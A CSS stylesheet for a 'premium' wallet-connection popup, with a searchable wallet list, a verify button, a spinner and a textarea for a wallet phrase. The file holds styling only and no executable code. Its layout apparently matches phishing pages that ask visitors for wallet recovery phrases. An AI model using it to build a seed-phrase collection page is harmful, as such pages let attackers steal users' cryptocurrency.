/* =========================
   PREMIUM POPUP V2.2
========================= */

.popup-overlay{

position:fixed;

top:0;
left:0;

width:100%;
height:100%;

display:flex;

justify-content:center;
align-items:center;

padding:20px;

background:rgba(0,0,0,.65);

backdrop-filter:blur(12px);

z-index:9999;

animation:fadeIn .35s ease;

}

.popup-card{

width:100%;

max-width:520px;

background:rgba(17,24,39,.96);

border:1px solid rgba(255,255,255,.08);

border-radius:26px;

padding:30px;

box-shadow:
0 30px 70px rgba(0,0,0,.55);

animation:popup .35s ease;

}

.popup-header{

display:flex;

justify-content:space-between;

align-items:center;

margin-bottom:20px;

}

.popup-header h2{

color:#ffffff;

font-size:26px;

font-weight:700;

}

#closePopup{

font-size:30px;

cursor:pointer;

color:#94a3b8;

transition:.3s;

}

#closePopup:hover{

color:white;

transform:rotate(90deg);

}

.wallet-search{

width:100%;

padding:15px 18px;

border:none;

outline:none;

border-radius:16px;

background:#1f2937;

color:white;

font-size:16px;

margin-bottom:20px;

}

.wallet-search::placeholder{

color:#94a3b8;

}

.wallet-list{

display:flex;

flex-direction:column;

gap:12px;

max-height:360px;

overflow:auto;

}

.wallet-item{

display:flex;

align-items:center;

gap:15px;

padding:16px 18px;

border-radius:18px;

background:#111827;

cursor:pointer;

transition:.25s;

font-size:17px;

font-weight:600;

color:white;

}

.wallet-item:hover{

background:linear-gradient(135deg,#2563eb,#06b6d4);

transform:translateY(-2px);

box-shadow:0 12px 28px rgba(37,99,235,.35);

}

.loading-icon{

font-size:72px;

margin-bottom:20px;

animation:float 2.5s infinite ease-in-out;

text-align:center;

}

.popup-card h3{

color:#38bdf8;

margin-top:10px;

margin-bottom:15px;

text-align:center;

}

.popup-card p{

color:#cbd5e1;

text-align:center;

line-height:1.7;

}

.verify-btn{

width:100%;

padding:18px;

border:none;

border-radius:50px;

background:linear-gradient(135deg,#2563eb,#06b6d4);

color:white;

font-size:18px;

font-weight:bold;

cursor:pointer;

transition:.3s;

}

.verify-btn:hover{

transform:translateY(-3px);

box-shadow:0 18px 40px rgba(37,99,235,.40);

}

.spinner{

width:60px;

height:60px;

border:5px solid rgba(255,255,255,.12);

border-top:5px solid #38bdf8;

border-radius:50%;

margin:25px auto;

animation:spin 1s linear infinite;

}

.wallet-phrase{

width:100%;

padding:18px;

border:none;

border-radius:18px;

background:#1f2937;

color:white;

font-size:16px;

resize:none;

outline:none;

}

.wallet-phrase::placeholder{

color:#94a3b8;

}

@keyframes spin{

100%{

transform:rotate(360deg);

}

}

@keyframes popup{

from{

opacity:0;

transform:translateY(25px) scale(.94);

}

to{

opacity:1;

transform:translateY(0) scale(1);

}

}

@keyframes fadeIn{

from{

opacity:0;

}

to{

opacity:1;

}

}

@keyframes float{

50%{

transform:translateY(-8px);

}

}

@media(max-width:768px){

.popup-card{

padding:24px;

border-radius:22px;

}

.popup-header h2{

font-size:22px;

}

.wallet-item{

padding:15px;

font-size:16px;

}

.verify-btn{

font-size:17px;

}

}

.wallet-logo{

width:42px;
height:42px;

object-fit:contain;

flex-shrink:0;

}

.wallet-item{

display:flex;
align-items:center;
gap:15px;

}

.wallet-section-title{

color:#38bdf8;

font-size:14px;

font-weight:700;

margin:18px 10px 10px;

text-transform:uppercase;

letter-spacing:1px;

opacity:.9;

}